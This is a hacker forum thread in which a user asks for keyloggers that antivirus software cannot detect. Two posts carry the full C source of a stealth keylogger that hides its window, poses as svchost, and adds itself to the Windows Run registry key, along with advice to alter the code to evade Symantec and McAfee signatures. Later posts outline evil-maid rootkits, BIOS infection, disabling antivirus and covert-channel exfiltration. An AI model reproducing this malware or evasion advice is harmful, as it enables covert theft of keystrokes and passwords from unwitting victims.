Jump to content


Photo
- - - - -

Undetectable KeyLoggers?


  • Please log in to reply
21 replies to this topic

#1 st0rm

st0rm

    HACK THE PLANET!

  • Banned
  • 59 posts

Posted 26 September 2005 - 07:42 PM

Anyone familiar with any software based keyloggers that are undetectable? .....by undetectable I mean none of the anti virus/spyware programs being not able catch it? and being able to install it with no problem?
thanks

#2 spoekalb

spoekalb

    DDP r0x0rz my s0x0rz

  • Agents of the Revolution
  • 1,280 posts
  • Gender:Male

Posted 26 September 2005 - 07:54 PM

If you know C/C++ you might be able to write something that watches the keyboard buffer and dumps to a file.

#3 Dr^ZigMan

Dr^ZigMan

    Publish or Perish!

  • Agents of the Revolution
  • 1,207 posts
  • Location:561

Posted 26 September 2005 - 07:56 PM

If you know C/C++ you might be able to write something that watches the keyboard buffer and dumps to a file.

View Post


Yeah, the anitvirus isn't seeing the virus, it's seeing the checksum for it. Sure they have "heretics (sp?)" but those are crap anyway.
-Dr^ZigMan

#4 st0rm

st0rm

    HACK THE PLANET!

  • Banned
  • 59 posts

Posted 26 September 2005 - 08:32 PM

If you know C/C++ you might be able to write something that watches the keyboard buffer and dumps to a file.

View Post


I did write a couple of basic viruses and keyloggers based on C plus.... But it didnt seem to work well with McAfee Anti Virus... I was just wondering if anyone knew about any undetectable (preferabaly free) keylogging software..thats floating around...

(When McAfee live scan is enabled it wont even let me execute the setup)

#5 lowtec

lowtec

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 492 posts

Posted 26 September 2005 - 08:40 PM

Anything that is free will already be in every AV's database. If you want something to be undetectable you will have to write / modify it yourself.

#6 tehbizz

tehbizz

    Progenitor of noob slaying

  • Members
  • 2,039 posts
  • Gender:Male

Posted 26 September 2005 - 09:24 PM

Use a hardware-based on, Symantec will never detect that!

#7 PyleFMJ

PyleFMJ

    DDP Fan club member

  • Members
  • 42 posts
  • Location:US

Posted 26 September 2005 - 09:31 PM

Hardware is the way to go. I've seen ones that are pretty much flash memory sticks that your plug the keyboard into and then plug the device into the comp. They weren't more then 50 bucks a couple of years ago.

#8 tokachu

tokachu

    SUPR3M3 31337 Mack Daddy P1MP

  • Agents of the Revolution
  • 458 posts
  • Country:
  • Gender:Male

Posted 26 September 2005 - 09:38 PM

I think the whole hardware keylogger thing might be dying. See this link:
http://www.keyghost....B-Keylogger.htm

The newest USB keyloggers only work with "legacy" USB keyboards. None of Apple's USB keyboards will work, period. IBM's (now Lenovo) USB keyboards don't work either, since they're both keyboards and USB 2.0 hubs, and you can only use a USB keylogger if you have a USB mouse that's attached to a separate port (???). Also, the hardware keyloger shows up in the USB devices menu!

#9 XlogicX

XlogicX

    SUP3R 31337

  • Validating
  • 160 posts
  • Gender:Male
  • Location:Tempe (Phoenix area)

Posted 27 September 2005 - 01:14 AM

hmm, that's weird.

I've used a couple of PS2 keyloggers. Even on USB keyboards, I just got a converter for those. It doesn't show up in the devices either. It's just a hardware buffer.

I don't want to sound over ambitious, but the possibility is there to make your own hardware keylogger too (just like you could code your own software). This would probably be something of more dedication though, that and the final product would probably be a larger size than most of the commercial products.

#10 Irongeek

Irongeek

    Dangerous free thinker

  • Agents of the Revolution
  • 1,516 posts
  • Location:Louisville, Ky more or less

Posted 27 September 2005 - 08:19 AM

White Scorpion wrote one awhile bace and released the code. I can't find it on his site anymore, but here is the thread where the source is:

http://www.antionlin...threadid=261930

#11 st0rm

st0rm

    HACK THE PLANET!

  • Banned
  • 59 posts

Posted 27 September 2005 - 12:03 PM

White Scorpion wrote one awhile bace and released the code. I can't find it on his site anymore, but here is the thread where the source is:

http://www.antionlin...threadid=261930

View Post


I compiled Whitescorpians code..but it still got detected by McAfee On_Scan...
Hey I havent used any of the hardware keyloggers such as Keykatcher....anyone used one of these? how do you extract info from them after its full? and can u password protect the logs?

#12 Irongeek

Irongeek

    Dangerous free thinker

  • Agents of the Revolution
  • 1,516 posts
  • Location:Louisville, Ky more or less

Posted 27 September 2005 - 12:14 PM

Did you try to change it a bit so the binary wont be the same? I compiled this:

/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 
*                                                                                  *
*  File: SVCHOST.c                                                                 *
*                                                                                  *
*  Purpose: a stealth keylogger, writes to file "svchost.log"                      *
*                                                                                  *       
*  Usage: compile to svchost.exe, copy to c:\%windir%\ and run it.                 *
*                                                                                  *
*  Copyright (C) 2004 White Scorpion, www.white-scorpion.nl, all rights reserved   *
*                                                                                  *
*  This program is free software; you can redistribute it and/or                   *
*  modify it under the terms of the GNU General Public License                     *
*  as published by the Free Software Foundation; either version 2                  *
*  of the License, or (at your option) any later version.                          *
*                                                                                  *
*  This program is distributed in the hope that it will be useful,                 *
*  but WITHOUT ANY WARRANTY; without even the implied warranty of                  *
*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                   *
*  GNU General Public License for more details.                                    *
*                                                                                  *
*  You should have received a copy of the GNU General Public License               *
*  along with this program; if not, write to the Free Software                     *
*  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.     *
*                                                                                  *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */

#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);
   
    int test,create;
    test=test_key();/*check if key is available for opening*/
         
    if (test==2)/*create key*/
    {
        char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
        create=create_key(path);
          
    }
        
   
    int t=get_keys();
    
    return t;
}  

int get_keys(void)
{
            short character;
              while(1)
              {
                     sleep(10);/*to prevent 100% cpu usage*/
                     for(character=8;character<=222;character++)
                     {
                         if(GetAsyncKeyState(character)==-32767)
                         {   
                             
                             FILE *file;
                             file=fopen("svchost.log","a+");
                             if(file==NULL)
                             {
                                     return 1;
                             }            
                             if(file!=NULL)
                             {        
                                     if((character>=39)&&(character<=64))
                                     {
                                           fputc(character,file);
                                           fclose(file);
                                           break;
                                     }        
                                     else if((character>64)&&(character<91))
                                     {
                                           character+=32;
                                           fputc(character,file);
                                           fclose(file);
                                           break;
                                     }
                                     else
                                     { 
                                         switch(character)
                                         {
                                               case VK_SPACE:
                                               fputc(' ',file);
                                               fclose(file);
                                               break;    
                                               case VK_SHIFT:
                                               fputs("[SHIFT]",file);
                                               fclose(file);
                                               break;                                            
                                               case VK_RETURN:
                                               fputs("\n[ENTER]",file);
                                               fclose(file);
                                               break;
                                               case VK_BACK:
                                               fputs("[BACKSPACE]",file);
                                               fclose(file);
                                               break;
                                               case VK_TAB:
                                               fputs("[TAB]",file);
                                               fclose(file);
                                               break;
                                               case VK_CONTROL:
                                               fputs("[CTRL]",file);
                                               fclose(file);
                                               break;    
                                               case VK_DELETE:
                                               fputs("[DEL]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_1:
                                               fputs("[;:]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_2:
                                               fputs("[/?]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_3:
                                               fputs("[`~]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_4:
                                               fputs("[ [{ ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_5:
                                               fputs("[\\|]",file);
                                               fclose(file);
                                               break;                                
                                               case VK_OEM_6:
                                               fputs("[ ]} ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_7:
                                               fputs("['\"]",file);
                                               fclose(file);
                                               break;
                                               /*case VK_OEM_PLUS:
                                               fputc('+',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_COMMA:
                                               fputc(',',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_MINUS:
                                               fputc('-',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_PERIOD:
                                               fputc('.',file);
                                               fclose(file);
                                               break;*/
                                               case VK_NUMPAD0:
                                               fputc('0',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD1:
                                               fputc('1',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD2:
                                               fputc('2',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD3:
                                               fputc('3',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD4:
                                               fputc('4',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD5:
                                               fputc('5',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD6:
                                               fputc('6',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD7:
                                               fputc('7',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD8:
                                               fputc('8',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD9:
                                               fputc('9',file);
                                               fclose(file);
                                               break;
                                               case VK_CAPITAL:
                                               fputs("[CAPS LOCK]",file);
                                               fclose(file);
                                               break;
                                               default:
                                               fclose(file);
                                               break;
                                        }        
                                   }    
                              }        
                    }    
                }                  
                     
            }
            return EXIT_SUCCESS;                            
}                                                 

int test_key(void)
{
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;
    
    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {    
        check=1;
        return check;
    }        
           
    reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);
    
    if((reg_key!=0)||(buf_length>BUFSIZE))
        check=2;
    if(reg_key==0)
        check=0;
         
    RegCloseKey(hKey);
    return check;   
}
   
int create_key(char *path)
{   
        int reg_key,check;
        
        HKEY hkey;
        
        reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        if(reg_key==0)
        {
                RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
                check=0;
                return check;
        }
        if(reg_key!=0)
                check=1;
                
        return check;
}


With the Bloodshed C++ beta and Symantec did not see it. (the precompiled binary that came with the source was detected) If you change the code around a bit, like using a differet log file name, it may not be detected.

#13 st0rm

st0rm

    HACK THE PLANET!

  • Banned
  • 59 posts

Posted 27 September 2005 - 12:31 PM

Did you try to change it a bit so the binary wont be the same? I compiled this:

/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 
*                                                                                  *
*  File: SVCHOST.c                                                                 *
*                                                                                  *
*  Purpose: a stealth keylogger, writes to file "svchost.log"                      *
*                                                                                  *       
*  Usage: compile to svchost.exe, copy to c:\%windir%\ and run it.                 *
*                                                                                  *
*  Copyright (C) 2004 White Scorpion, www.white-scorpion.nl, all rights reserved   *
*                                                                                  *
*  This program is free software; you can redistribute it and/or                   *
*  modify it under the terms of the GNU General Public License                     *
*  as published by the Free Software Foundation; either version 2                  *
*  of the License, or (at your option) any later version.                          *
*                                                                                  *
*  This program is distributed in the hope that it will be useful,                 *
*  but WITHOUT ANY WARRANTY; without even the implied warranty of                  *
*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                   *
*  GNU General Public License for more details.                                    *
*                                                                                  *
*  You should have received a copy of the GNU General Public License               *
*  along with this program; if not, write to the Free Software                     *
*  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.     *
*                                                                                  *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */

#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);
   
    int test,create;
    test=test_key();/*check if key is available for opening*/
         
    if (test==2)/*create key*/
    {
        char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
        create=create_key(path);
          
    }
        
   
    int t=get_keys();
    
    return t;
}  

int get_keys(void)
{
            short character;
              while(1)
              {
                     sleep(10);/*to prevent 100% cpu usage*/
                     for(character=8;character<=222;character++)
                     {
                         if(GetAsyncKeyState(character)==-32767)
                         {   
                             
                             FILE *file;
                             file=fopen("svchost.log","a+");
                             if(file==NULL)
                             {
                                     return 1;
                             }            
                             if(file!=NULL)
                             {        
                                     if((character>=39)&&(character<=64))
                                     {
                                           fputc(character,file);
                                           fclose(file);
                                           break;
                                     }        
                                     else if((character>64)&&(character<91))
                                     {
                                           character+=32;
                                           fputc(character,file);
                                           fclose(file);
                                           break;
                                     }
                                     else
                                     { 
                                         switch(character)
                                         {
                                               case VK_SPACE:
                                               fputc(' ',file);
                                               fclose(file);
                                               break;    
                                               case VK_SHIFT:
                                               fputs("[SHIFT]",file);
                                               fclose(file);
                                               break;                                            
                                               case VK_RETURN:
                                               fputs("\n[ENTER]",file);
                                               fclose(file);
                                               break;
                                               case VK_BACK:
                                               fputs("[BACKSPACE]",file);
                                               fclose(file);
                                               break;
                                               case VK_TAB:
                                               fputs("[TAB]",file);
                                               fclose(file);
                                               break;
                                               case VK_CONTROL:
                                               fputs("[CTRL]",file);
                                               fclose(file);
                                               break;    
                                               case VK_DELETE:
                                               fputs("[DEL]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_1:
                                               fputs("[;:]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_2:
                                               fputs("[/?]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_3:
                                               fputs("[`~]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_4:
                                               fputs("[ [{ ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_5:
                                               fputs("[\\|]",file);
                                               fclose(file);
                                               break;                                
                                               case VK_OEM_6:
                                               fputs("[ ]} ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_7:
                                               fputs("['\"]",file);
                                               fclose(file);
                                               break;
                                               /*case VK_OEM_PLUS:
                                               fputc('+',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_COMMA:
                                               fputc(',',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_MINUS:
                                               fputc('-',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_PERIOD:
                                               fputc('.',file);
                                               fclose(file);
                                               break;*/
                                               case VK_NUMPAD0:
                                               fputc('0',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD1:
                                               fputc('1',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD2:
                                               fputc('2',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD3:
                                               fputc('3',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD4:
                                               fputc('4',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD5:
                                               fputc('5',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD6:
                                               fputc('6',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD7:
                                               fputc('7',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD8:
                                               fputc('8',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD9:
                                               fputc('9',file);
                                               fclose(file);
                                               break;
                                               case VK_CAPITAL:
                                               fputs("[CAPS LOCK]",file);
                                               fclose(file);
                                               break;
                                               default:
                                               fclose(file);
                                               break;
                                        }        
                                   }    
                              }        
                    }    
                }                  
                     
            }
            return EXIT_SUCCESS;                            
}                                                 

int test_key(void)
{
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;
    
    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {    
        check=1;
        return check;
    }        
           
    reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);
    
    if((reg_key!=0)||(buf_length>BUFSIZE))
        check=2;
    if(reg_key==0)
        check=0;
         
    RegCloseKey(hKey);
    return check;   
}
   
int create_key(char *path)
{   
        int reg_key,check;
        
        HKEY hkey;
        
        reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        if(reg_key==0)
        {
                RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
                check=0;
                return check;
        }
        if(reg_key!=0)
                check=1;
                
        return check;
}


With the Bloodshed C++ beta and Symantec did not see it. (the precompiled binary that came with the source was detected) If you change the code around a bit, like using a differet log file name, it may not be detected.

View Post




Did the Same thing you did......I have MCAFEE OnScan/LiveScan and it detects and..wont even install...

#14 Irongeek

Irongeek

    Dangerous free thinker

  • Agents of the Revolution
  • 1,516 posts
  • Location:Louisville, Ky more or less

Posted 27 September 2005 - 12:36 PM

So you are saying you did change the code? For example, change the name of the reg key it uses, the logfile or just about anything to make the binary a little different?

#15 XlogicX

XlogicX

    SUP3R 31337

  • Validating
  • 160 posts
  • Gender:Male
  • Location:Tempe (Phoenix area)

Posted 27 September 2005 - 07:05 PM

The keykatcher is password protected. You access it with any text editor.

This article was from a while back, but still relavant.
http://www.phx2600.o.../keylogging.htm

#16 st0rm

st0rm

    HACK THE PLANET!

  • Banned
  • 59 posts

Posted 27 September 2005 - 11:55 PM

So you are saying you did change the code? For example, change the name of the reg key it uses, the logfile or just about anything to make the binary a little different?

View Post



Yup..you said it.

#17 Bluerose

Bluerose

    Will I break 10 posts?

  • Members
  • 4 posts
  • Country:
  • Gender:Female
  • Location:uk

Posted 18 May 2011 - 03:13 AM

Anyone familiar with any software based keyloggers that are undetectable? .....by undetectable I mean none of the anti virus/spyware programs being not able catch it? and being able to install it with no problem?
thanks

you need commercial keylogger, I guess.
Take a look the following one
perfect keylogger
keylogger for PC

Edited by Bluerose, 23 May 2011 - 04:24 AM.


#18 army_of_one

army_of_one

    SUP3R 31337 P1MP

  • Members
  • 282 posts

Posted 28 August 2011 - 12:30 AM

Anyone familiar with any software based keyloggers that are undetectable? .....by undetectable I mean none of the anti virus/spyware programs being not able catch it? and being able to install it with no problem?
thanks


First, compromise the machine physically with an boot attack (e.g. evil maid), firewire, or DMA over custom PCI/ExpressCard device. Then, you have some options:

1. Modify installed OS to load Windows, your rootkit and bogus AV app that has visible icon & basic dialog. Keylogger included.
2. Virtualize windows with a subverted hypervisor/VMM, with your rootkit controlling the "real" keyboard.
3. Disable the AV entirely (hoping they won't notice) and put in a run-of-the-mill keylogger.
4. Modify the keyboard driver to send any key pressed to your software, which just looks like it's moving memory. Another process sends that to you over safe channel.

The most undetectable attack is the one almost all computers are vulnerable to and nobody looks for. Well, there's three there: infections that survive reformat, covert channels and emanation security. Such esoteric attacks are my specialty. They are insidious.

Infections that survive reformat are classic. The best way to do it is BIOS infection. Get their BIOS, modify it to contain your rootkit as well, and it loads until they can overwrite their BIOS. (A good design should prevent that but requires much sophistication.) Many academics are [finally] looking into using trusted hardware connected to main chips to look for malware & stuff. Well, guess what? You can use the same approach to constantly inject malware or leak keyboard's internal communications. You should use a tiny SOC & connect it in a professional looking way. Best to do it to an identical piece of hardware, put in their hard disk, break it in a believably innocent way, and let them do a "clean" install. Their system will remain dirty until they buy new hardware. (oh the lulz... 8)

A covert channel can form anytime two subjects (e.g. users, processes) share an object (e.g. CPU time, a storage area). A covert storage channel uses a shared storage resource to move information. A covert timing channel happens when two processes can see how long it takes to use a given resource. The sender alternates between tying it up and making it quick, representing 1's and 0's. There are ways to mostly eliminate these, but modern OS's ignore them altogether. (Yes, I am grinning most evily.) The keyboard driver or API could be modified to subtly leak key information over a covert channel. Covert channel bandwidth ranges from 1bps to several MBps. The cache issue for AES & RSA was a covert timing channel caused by cache interactions. I and many others identified tons of covert storage channels in TCP/UDP/IP stacks (think I posted an analysis here). There's still around 64+bits of extra space per packet that many people wont pay attention to. One HTTP session sends TONS of packets. Insert something into TCP/IP stack to utilize that if it sees a certain unique identifier in the system call data. So many possibilities. A typical sysadmin would never notice & not be able to comprehend what was happening. (I haven't even began on processor or firmware errata... mainly because the other vulnerabilities are always there lol 8)

EMSEC is emanation security. This is the electromagnetic emanations that a computer emits during its operations that may contain patterns that can be used to reconstruct what it did. The emanations may be passively sent into the surrounding area, actively polled by the attacker, or transmitted over power lines. There are other side channels as well. (In around 2000-2001, I designed a concept of using the sound of keys being pressed with a laser bounce on a keyboard or laptop. I think that was independently done a year or two ago.) The EMSEC issues require power filters, shielded cabling, and properly shielded equipment. This is under the umbrella of TEMPEST. TEMPEST Level 1 products are expensive, bulky and hard to get a hold of. The government also classifies what we need to know to protect ourselves. (And, no, a TEMPEST expert told me a Faraday cage isn't the end all solution it sounds like.) I don't have the links but you should Google "keyboard eavesdropping" with words like power outlet and antenna. A group of researchers did it in past few years on video and put it online.

So, stealth keylogging is easy because *real* security is hard & the market provides no incentives to build it. High assurance (A1/EAL7/NSA-Type1) design techniques can prevent most or all of these problems. However, high assurance systems are a rarity & modern OS's and hardware leak like a sieve. Hence, if you using the latter and you're enemy is [smart/determined/sophisticated], you're screwed. Q.E.D.

Nick P
schneier.com

#19 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 403 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 02 September 2011 - 12:54 PM


Anyone familiar with any software based keyloggers that are undetectable? .....by undetectable I mean none of the anti virus/spyware programs being not able catch it? and being able to install it with no problem?
thanks


First, compromise the machine physically with an boot attack (e.g. evil maid), firewire, or DMA over custom PCI/ExpressCard device. Then, you have some options:

1. Modify installed OS to load Windows, your rootkit and bogus AV app that has visible icon & basic dialog. Keylogger included.
2. Virtualize windows with a subverted hypervisor/VMM, with your rootkit controlling the "real" keyboard.
3. Disable the AV entirely (hoping they won't notice) and put in a run-of-the-mill keylogger.
4. Modify the keyboard driver to send any key pressed to your software, which just looks like it's moving memory. Another process sends that to you over safe channel.

The most undetectable attack is the one almost all computers are vulnerable to and nobody looks for. Well, there's three there: infections that survive reformat, covert channels and emanation security. Such esoteric attacks are my specialty. They are insidious.

Infections that survive reformat are classic. The best way to do it is BIOS infection. Get their BIOS, modify it to contain your rootkit as well, and it loads until they can overwrite their BIOS. (A good design should prevent that but requires much sophistication.) Many academics are [finally] looking into using trusted hardware connected to main chips to look for malware & stuff. Well, guess what? You can use the same approach to constantly inject malware or leak keyboard's internal communications. You should use a tiny SOC & connect it in a professional looking way. Best to do it to an identical piece of hardware, put in their hard disk, break it in a believably innocent way, and let them do a "clean" install. Their system will remain dirty until they buy new hardware. (oh the lulz... 8)

A covert channel can form anytime two subjects (e.g. users, processes) share an object (e.g. CPU time, a storage area). A covert storage channel uses a shared storage resource to move information. A covert timing channel happens when two processes can see how long it takes to use a given resource. The sender alternates between tying it up and making it quick, representing 1's and 0's. There are ways to mostly eliminate these, but modern OS's ignore them altogether. (Yes, I am grinning most evily.) The keyboard driver or API could be modified to subtly leak key information over a covert channel. Covert channel bandwidth ranges from 1bps to several MBps. The cache issue for AES & RSA was a covert timing channel caused by cache interactions. I and many others identified tons of covert storage channels in TCP/UDP/IP stacks (think I posted an analysis here). There's still around 64+bits of extra space per packet that many people wont pay attention to. One HTTP session sends TONS of packets. Insert something into TCP/IP stack to utilize that if it sees a certain unique identifier in the system call data. So many possibilities. A typical sysadmin would never notice & not be able to comprehend what was happening. (I haven't even began on processor or firmware errata... mainly because the other vulnerabilities are always there lol 8)

EMSEC is emanation security. This is the electromagnetic emanations that a computer emits during its operations that may contain patterns that can be used to reconstruct what it did. The emanations may be passively sent into the surrounding area, actively polled by the attacker, or transmitted over power lines. There are other side channels as well. (In around 2000-2001, I designed a concept of using the sound of keys being pressed with a laser bounce on a keyboard or laptop. I think that was independently done a year or two ago.) The EMSEC issues require power filters, shielded cabling, and properly shielded equipment. This is under the umbrella of TEMPEST. TEMPEST Level 1 products are expensive, bulky and hard to get a hold of. The government also classifies what we need to know to protect ourselves. (And, no, a TEMPEST expert told me a Faraday cage isn't the end all solution it sounds like.) I don't have the links but you should Google "keyboard eavesdropping" with words like power outlet and antenna. A group of researchers did it in past few years on video and put it online.

So, stealth keylogging is easy because *real* security is hard & the market provides no incentives to build it. High assurance (A1/EAL7/NSA-Type1) design techniques can prevent most or all of these problems. However, high assurance systems are a rarity & modern OS's and hardware leak like a sieve. Hence, if you using the latter and you're enemy is [smart/determined/sophisticated], you're screwed. Q.E.D.

Nick P
schneier.com


^what he said

#20 dinscurge

dinscurge

    "I Hack, therefore, I am"

  • Members
  • 938 posts
  • Country:
  • Gender:Male
  • Location:the bunker

Posted 03 September 2011 - 10:32 PM

but keylogging is useless when people like google are pushing for everything to be cloud, just use ettercap/wireshark and ssl strip, even besides that, most all passwords/usernames whatever are for websites/forums/videogames ect. that would use the net anyways.. as for over writing the bios, not cool :p. theres some kinda chance your trashing there motherboard if you prevent them from flashing over the bios, say a new cpu comes out for that socket they want, good luck with that ;). its too far out of the way anyways to just get some password,




BinRev is hosted by the great people at Lunarpages!